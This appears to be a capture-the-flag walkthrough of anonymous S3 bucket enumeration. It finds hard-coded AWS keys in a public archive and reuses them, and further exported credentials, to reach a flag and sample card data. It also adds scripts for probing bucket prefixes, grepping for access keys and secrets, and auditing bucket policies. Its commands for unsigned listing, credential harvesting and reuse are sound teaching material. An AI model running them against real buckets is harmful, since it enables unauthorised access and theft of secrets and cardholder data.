# S3 Enumeration Basics

CTF Source: [Pwned Labs](https://pwnedlabs.io/labs/aws-s3-enumeration-basics)

## Overview

In this walkthrough, we're given a website link. After discovering that the site loads content from an S3 bucket, we'll enumerate the bucket anonymously and, thanks to an overly permissive bucket configuration, find hard-coded credentials that lead to further credentials, a flag, and plaintext credit card data.

## Pre-Requisites

* Install awscli: `(brew/apt) install awscli`

## Walkthrough

### Finding and Accessing the S3 Bucket

We'll start by visiting the website in our browser and inspecting its source code.

We'll discover the website is retrieving content from an S3 bucket.

<figure><img src="/files/cflE1RwdyLqlp8wmNgMF" alt=""><figcaption></figcaption></figure>

If we browse directly to that CSS file's S3 URL, it loads, so at least that one object is readable without any authentication.

<figure><img src="/files/6lI6f6i2g1TVjgmlOGOb" alt=""><figcaption></figcaption></figure>

Let's try traversing the bucket's directories in the browser to see if we can reach other files.

<figure><img src="/files/zbF64xONxYiCw4EeGYa1" alt=""><figcaption></figcaption></figure>

Let's switch to `awscli` and list the bucket by name, using the bucket name from the S3 URL in the page source:

```bash
aws s3 ls s3://dev.huge-logistics.com --no-sign-request      
  
                           PRE admin/
                           PRE migration-files/
                           PRE shared/
                           PRE static/
2023-10-16 11:00:47       5347 index.html 
```

* `--no-sign-request` sends the request unsigned, so S3 evaluates it as the anonymous (`*`) principal instead of whatever credentials happen to be in your local AWS profile. That's the right first test: it shows exactly what anyone on the internet can see.

Now we can see the bucket's layout: four prefixes and the site's `index.html`.

Listing each prefix the same way, only `shared/` lets an anonymous caller see its contents; `admin/`, `migration-files/` and `static/` are denied. Note the difference from the CSS file earlier: fetching an object by its exact key needs `s3:GetObject`, while listing needs `s3:ListBucket`, and the two are granted independently. (In the listing below, the 0-byte entry is the placeholder object the S3 console creates when a "folder" is made in it.)

```bash
aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request

2023-10-16 09:08:33          0 
2023-10-16 09:09:01        993 hl_migration_project.zip
```
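The two manual steps above, pulling the bucket name out of the page source and then trying each prefix anonymously, scripted as an added example. This is not part of the lab or of the original walkthrough. It assumes you've saved the page source to a file; the bucket-name extraction is pure text processing and runs offline, while `probe_prefixes` makes the same unsigned `aws s3 ls` calls as above and needs `awscli` and network.

```shell
#!/usr/bin/env bash
# Added example (not from the lab or the original walkthrough): find S3 bucket
# names referenced by a saved page, then probe each top-level prefix
# anonymously to see which ones are listable.

# Print the bucket names referenced by S3 URLs on stdin, one per line.
# Handles both URL styles S3 uses:
#   virtual-hosted:  https://BUCKET.s3.amazonaws.com/key
#                    https://BUCKET.s3.REGION.amazonaws.com/key
#                    http://BUCKET.s3-website-REGION.amazonaws.com/key
#   path-style:      https://s3.amazonaws.com/BUCKET/key
#                    https://s3.REGION.amazonaws.com/BUCKET/key
s3_buckets_from_html() {
  grep -oE 'https?://[A-Za-z0-9._-]*s3[A-Za-z0-9.-]*\.amazonaws\.com(/[A-Za-z0-9._-]+)?' \
    | sed -E \
        -e 's#^https?://##' \
        -e 's#^([A-Za-z0-9._-]+)\.s3[A-Za-z0-9.-]*\.amazonaws\.com.*#\1#' \
        -e 's#^(s3[A-Za-z0-9.-]*\.amazonaws\.com)/([A-Za-z0-9._-]+).*#\2#' \
    | grep -vE '^s3[A-Za-z0-9.-]*\.amazonaws\.com$' \
    | sort -u
}

# List a bucket's top-level prefixes anonymously, then try to list each one.
# Prints one line per prefix: LISTABLE or denied. Needs awscli and network.
probe_prefixes() {
  bucket="$1"
  aws s3 ls "s3://${bucket}/" --no-sign-request \
    | awk '$1 == "PRE" { print $2 }' \
    | while read -r prefix; do
        if aws s3 ls "s3://${bucket}/${prefix}" --no-sign-request >/dev/null 2>&1; then
          printf 'LISTABLE  %s\n' "$prefix"
        else
          printf 'denied    %s\n' "$prefix"
        fi
      done
}

# Usage: ./s3_probe.sh saved_page.html
if [ -n "${1:-}" ]; then
  s3_buckets_from_html < "$1" | while read -r bucket; do
    printf '== %s\n' "$bucket"
    probe_prefixes "$bucket"
  done
fi
```

A prefix reported as denied is not necessarily unreadable: as with the CSS file, an object under it may still be fetchable by exact key if `s3:GetObject` is granted without `s3:ListBucket`.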

Let's attempt to download this file.

{% code overflow="wrap" %}

```bash
aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip --no-sign-request .

download: s3://dev.huge-logistics.com/shared/hl_migration_project.zip to ./hl_migration_project.zip
```

{% endcode %}

Nice! Let's open it up and see what we can find.

### Finding Credentials

Unzipping the file:

```bash
unzip ./hl_migration_project.zip
```

Reading the contents:

```bash
cat migrate_secrets.ps1 

# AWS Configuration
$accessKey = "AKIA3[snip]"
$secretKey = "MwGe3[snip]"
$region = "us-east-1"
[snip]
```

We found an access key pair hard-coded in a migration script. The `AKIA` prefix marks a long-term IAM user key (temporary STS keys start with `ASIA`), so it won't expire on its own.
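Rather than reading the script by eye, here is an added example (not from the lab) that sweeps the whole unpacked archive for access key IDs and secret-looking lines, and identifies a found key before it is used for anything. The `AKIA`/`ASIA` pattern is AWS's documented key ID format; `whoami_for_key` is the one part that needs `awscli` and network.

```shell
#!/usr/bin/env bash
# Added example (not from the lab): triage an unpacked archive for hard-coded
# AWS credentials, then confirm what a found key is before using it.

# Print file:line:key for every AWS access key ID under a directory.
# Long-term IAM user keys start with AKIA, temporary STS keys with ASIA;
# both are exactly 20 upper-case alphanumerics. -w stops the 20-character
# pattern from firing inside a longer token.
find_aws_key_ids() {
  grep -rHnowE '(AKIA|ASIA)[A-Z0-9]{16}' "$1" | sort -u
}

# Print lines that name a secret, so the secret key or password belonging
# to a key ID can be found next to it. Case-insensitive, with file:line.
find_secret_lines() {
  grep -rHniE 'secret|password|passwd' "$1"
}

# Identify the principal behind a key pair without touching any bucket.
# sts:GetCallerIdentity needs no IAM permission and cannot be denied by
# policy, but it is logged to CloudTrail like any other call.
# Needs awscli and network.
whoami_for_key() {
  AWS_ACCESS_KEY_ID="$1" AWS_SECRET_ACCESS_KEY="$2" \
  AWS_DEFAULT_REGION="${3:-us-east-1}" \
    aws sts get-caller-identity --output text
}

# Usage: ./triage.sh <directory> [ACCESS_KEY_ID SECRET_ACCESS_KEY]
if [ -n "${1:-}" ]; then
  find_aws_key_ids "$1"
  find_secret_lines "$1"
  if [ $# -ge 3 ]; then
    whoami_for_key "$2" "$3"
  fi
fi
```

`sts get-caller-identity` is the first call to make with any found key: it returns the account, user ID and ARN behind the key before you touch a bucket, and knowing the principal's name usually tells you what the key was issued for, which is how the migration key's limited S3 rights below make sense.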

### Gaining Access to migration-files

We can use `aws configure` to set these credentials as our default profile (or `aws configure --profile <name>` to keep them separate from your own).

Let's retry the `admin` prefix that was denied anonymously.

```bash
aws s3 ls s3://dev.huge-logistics.com/admin/       
                     
2023-10-16 09:08:38          0 
2023-10-16 09:10:51         32 flag.txt
2023-10-16 14:24:07       2425 website_transactions_export.csv
```

Okay, we're getting somewhere. Can we download the data?

```bash
aws s3 cp s3://dev.huge-logistics.com/admin/flag.txt .

fatal error: An error occurred (403) when calling the HeadObject operation: Forbidden
```

Nope. `aws s3 cp` sends a `HeadObject` request before the transfer, and S3 authorizes `HeadObject` like `GetObject`, so a 403 here after a successful listing means the migration key has `s3:ListBucket` for `admin/` but not `s3:GetObject` on the objects under it. (Had listing been denied as well, S3 would answer `HeadObject` with 403 even for a key that doesn't exist, so the two cases couldn't be told apart.) Let's move on to `migration-files/` and try that.

{% code overflow="wrap" %}

```bash
aws s3 ls s3://dev.huge-logistics.com/migration-files/       
           
2023-10-16 09:08:47          0 
2023-10-16 09:09:26    1833646 AWS Secrets Manager Migration - Discovery & Design.pdf
2023-10-16 09:09:25    1407180 AWS Secrets Manager Migration - Implementation.pdf
2023-10-16 09:09:27       1853 migrate_secrets.ps1
2023-10-16 12:00:13       2494 test-export.xml
```

{% endcode %}

{% code overflow="wrap" %}

```bash
aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml .   
 
download: s3://dev.huge-logistics.com/migration-files/test-export.xml to ./test-export.xml
```

{% endcode %}

The download worked. Let's read the file.

{% code overflow="wrap" %}

```bash
cat test-export.xml 
   
<?xml version="1.0" encoding="UTF-8"?>
<CredentialsExport>
    <!-- Oracle Database Credentials -->
[SNIP]
    </CredentialEntry>
    <!-- AWS Production Credentials -->
    <CredentialEntry>
        <ServiceType>AWS IT Admin</ServiceType>
```

{% endcode %}

Looks like we found credentials for several systems in one export, an Oracle database and an AWS production user among them. Let's test out the `AWS IT Admin` creds.

### Gaining Access to admin

Again, we'll set up our credentials, this time as a named profile so they don't overwrite the migration key:

```bash
aws configure --profile it-admin
```

Let's try to download those admin files now.

{% code overflow="wrap" %}

```bash
aws --profile it-admin s3 cp s3://dev.huge-logistics.com/admin/flag.txt .

download: s3://dev.huge-logistics.com/admin/flag.txt to ./flag.txt
```

{% endcode %}

```bash
cat ./flag.txt     

a49f1[snip]
```

Success! We found the flag. Likewise, downloading the other file, `website_transactions_export.csv`, uncovers plaintext credit card information, including full card numbers, CVVs and customer passwords:

{% code overflow="wrap" %}

```bash
cat website_transactions_export.csv 

network,credit_card_number,cvv,expiry_date,card_holder_name,validation,username,password,ip_address
Visa,4055497191304,386,5/2021,Hunter Miller,,hunter_m,password123,34.56.78.90
Visa,4055491339081,492,8/2021,Jayden Adams,,jay_adams,jayden2023,157.89.34.56
[SNIP]
```

{% endcode %}

## Wrap-up

In this scenario, unauthorized access was obtained to a shared folder within the S3 bucket without authentication. Subsequently, a zip file was downloaded from this folder, revealing a script embedded with hard-coded AWS credentials. These credentials were leveraged to access the `/migration-files/` folder, where a file containing additional hard-coded credentials, including those for the `AWS IT Admin` user, was retrieved. Utilizing the IT Admin credentials, we successfully obtained the flag and plaintext credit card data from the `/admin/` directory of the S3 bucket.

Let's discuss a few issues we uncovered along the way:

1. Multi-use of an S3 bucket
   * This bucket served at least three purposes: website hosting, credit card data storage and a secrets-management migration.
   * One bucket policy then has to express the access rules for all of them, and a grant meant for one use (anonymous reads for the website) spills over onto the others, as we saw.
   * Recommendation:
     * Use separate buckets for different use cases, so each can have a simple policy and the private ones can have S3 Block Public Access turned on.

2. Mishandling of credit card data
   * The credit card data was stored in plaintext, next to a website, together with CVVs and customer passwords. CVVs must never be retained after authorization under PCI DSS, encrypted or not.
   * Server-side encryption at rest would not have helped here: S3 decrypts transparently for any caller the policy allows, and the data left through the ordinary `GetObject` path.
   * Recommendation:
     * Don't store full card numbers and CVVs at all; use a payment processor's tokens if card references are needed.
     * Keep any remaining cardholder data in a dedicated, non-public location with access restricted to the principals that need it.

3. World-readable `shared` directory
   * This directory was listable and readable by anyone and contained hard-coded secrets for several systems.
   * The exposed secrets enabled privilege escalation, ultimately leading to the exfiltration of credit card data.
   * Recommendation:
     * Store this data in an appropriate location and restrict access.
     * If the data needs to be shared externally, enable cross-account access via an IAM role or use another secure sharing mechanism rather than an anonymous grant.
     * Treat every key in the archive as compromised: rotate it, and review CloudTrail for use of the old key ID.
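For the first and third points, here is an added example showing a bucket policy that would produce the access observed above, a tightened replacement, and the owner-side checks. The weak policy is an assumption about how the lab bucket could have been configured (its real policy is never shown); the hardened one keeps only the anonymous object reads the website needs under `static/`. Nothing here is the lab's own configuration. The checking and apply functions need `awscli` with credentials allowed to read and write the bucket configuration.

```shell
#!/usr/bin/env bash
# Added example (not the lab's real configuration): a bucket policy that
# would produce the access observed above, a tightened replacement, and the
# checks a bucket owner can run. Policy bodies are assumptions for
# illustration; network calls are confined to audit_bucket and
# apply_hardened_policy.

# Assumed weak policy: anonymous ListBucket on the top level and on shared/,
# plus anonymous GetObject under shared/. That matches what the unsigned
# `aws s3 ls` and `aws s3 cp` calls above were allowed to do.
weak_policy() {
  cat <<EOF
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AnonListTopLevelAndShared",
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:ListBucket",
      "Resource": "arn:aws:s3:::$1",
      "Condition": { "StringLike": { "s3:prefix": [ "", "shared/*" ] } }
    },
    {
      "Sid": "AnonReadShared",
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::$1/shared/*"
    }
  ]
}
EOF
}

# Tightened policy: anonymous reads only for the website assets under
# static/ (the stylesheet the site loads), no anonymous listing at all, and
# nothing public under admin/, migration-files/ or shared/.
hardened_policy() {
  cat <<EOF
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "PublicReadStaticAssetsOnly",
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::$1/static/*"
    }
  ]
}
EOF
}

# Count the statements in a policy (on stdin) that grant to everyone.
count_public_statements() {
  grep -c '"Principal": "\*"'
}

# Owner-side checks. An error from get-public-access-block means no
# bucket-level configuration exists, i.e. nothing is blocked at that level.
audit_bucket() {
  bucket="$1"
  printf '== Block Public Access (all four flags should be true unless the bucket is meant to be public)\n'
  aws s3api get-public-access-block --bucket "$bucket" --output text || true
  printf '== Policy status (IsPublic)\n'
  aws s3api get-bucket-policy-status --bucket "$bucket" --output text || true
  printf '== What an anonymous caller can list at the top level\n'
  aws s3 ls "s3://${bucket}/" --no-sign-request || true
}

# Replace the bucket policy with the tightened one.
apply_hardened_policy() {
  aws s3api put-bucket-policy --bucket "$1" --policy "$(hardened_policy "$1")"
}

# Usage: ./bucket_audit.sh <bucket> [apply]
if [ -n "${1:-}" ]; then
  audit_bucket "$1"
  if [ "${2:-}" = "apply" ]; then
    apply_hardened_policy "$1"
  fi
fi
```

`get-bucket-policy-status` reports `IsPublic` as true whenever a policy grants to `*`, which is expected for a genuinely public asset bucket and a finding for anything else. For the separate private buckets recommended above, `put-public-access-block` with all four flags true makes a policy like `weak_policy` impossible to attach in the first place.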

